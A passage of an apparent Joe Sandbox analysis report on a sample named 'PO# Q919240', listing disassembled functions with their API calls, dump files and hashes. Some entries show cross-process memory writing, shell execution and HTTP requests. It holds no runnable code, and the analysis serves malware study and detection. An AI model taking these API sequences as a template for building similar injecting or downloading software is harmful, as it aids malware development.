                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: DeleteDestroyObject$IconMessageSendWindow
                • String ID:
                • API String ID: 1489400265-0
                • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                Function 00455607 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                • DestroyWindow.USER32(?), ref: 00455728
                • DeleteObject.GDI32(?), ref: 00455736
                • DeleteObject.GDI32(?), ref: 00455744
                • DestroyIcon.USER32(?), ref: 00455752
                • DestroyWindow.USER32(?), ref: 00455760
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                • String ID:
                • API String ID: 1042038666-0
                • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                Function 00417803 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • __getptd.LIBCMT ref: 0041780F
                  • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                  • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                • __getptd.LIBCMT ref: 00417826
                • __amsg_exit.LIBCMT ref: 00417834
                • __lock.LIBCMT ref: 00417844
                • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                • String ID:
                • API String ID: 938513278-0
                • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                Function 00413D0E Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                • ___set_flsgetvalue.LIBCMT ref: 00413D20
                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                • ExitThread.KERNEL32 ref: 00413D4E
                • GetCurrentThreadId.KERNEL32 ref: 00413D54
                • __freefls@4.LIBCMT ref: 00413D74
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                • String ID:
                • API String ID: 2403457894-0
                • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                Function 004151AF Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                • ___set_flsgetvalue.LIBCMT ref: 004151C0
                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                • ___fls_getvalue@4.LIBCMT ref: 004151CB
                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                • ___fls_setvalue@8.LIBCMT ref: 004151DD
                • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                • ExitThread.KERNEL32 ref: 004151ED
                • __freefls@4.LIBCMT ref: 00415209
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                • String ID:
                • API String ID: 4247068974-0
                • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                Function 0044F405 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 302COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID: )$U$\
                • API String ID: 0-3705770531
                • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                Function 0046E48D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                • CoInitialize.OLE32(00000000), ref: 0046E505
                • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                • CoUninitialize.OLE32 ref: 0046E53D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CreateInitializeInstanceUninitialize_wcslen
                • String ID: .lnk
                • API String ID: 886957087-24824748
                • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                Function 0044E180 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _memmove
                • String ID: \
                • API String ID: 4104443479-2967466578
                • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                Function 0044E189 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _memmove
                • String ID: \
                • API String ID: 4104443479-2967466578
                • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                Function 0044E199 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 260COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _memmove
                • String ID: \
                • API String ID: 4104443479-2967466578
                • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                Function 0046A6E1 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 241COMMON
                Download Yara Rule
                Strings
                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                • API String ID: 708495834-557222456
                • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                Function 0043659E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                  • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                  • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                  • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                  • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                • String ID: @
                • API String ID: 4150878124-2766056989
                • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                Function 0044F137 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _memmove
                • String ID: \$]$h
                • API String ID: 4104443479-3262404753
                • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                Function 00457C53 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                Download Yara Rule
                APIs
                • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                • CloseHandle.KERNEL32(?), ref: 00457E09
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                • String ID: <$@
                • API String ID: 2417854910-1426351568
                • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                Function 0044A856 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122networkCOMMON
                Download Yara Rule
                APIs
                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                • String ID:
                • API String ID: 3705125965-3916222277
                • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                Function 0045FA41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120windowCOMMON
                Download Yara Rule
                APIs
                • GetMenuItemInfoW.USER32 ref: 0045FAC4
                • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
